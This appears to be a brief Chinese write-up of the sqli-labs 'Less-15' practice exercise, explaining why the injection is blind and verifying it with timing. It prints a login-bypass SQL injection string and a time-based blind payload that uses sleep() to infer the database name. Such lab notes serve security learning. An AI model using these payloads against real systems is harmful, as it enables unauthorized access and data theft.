Less-15【盲注+时间注入】

利用单引号双引号进行测试发现网页无回显，所以注入方式为盲注，并且测试结果需要用时间注入来验证

用万能语句进行测试，双引号无反应，单引号测试成功

123' or 1=1 #

利用时间注入测试

后续测试结果与之前相同

123'or if((database()='security'),sleep(0.3),sleep(0.1))#

相关资源

相似解决方案

热门标签

Java Python linux javascript Mysql C# Docker 算法前端 SpringBoot Redis Vue spring 设计模式 .net core .net kubernetes c++ 数据库数据结构大数据 js 机器学习微服务 Android Go 程序员面试 JVM ASP.net core 云原生人工智能后端 PHP git CSS golang k8s Nginx Django mybatis 深度学习多线程 React 架构 devops 爬虫云计算 Spring Boot LeetCode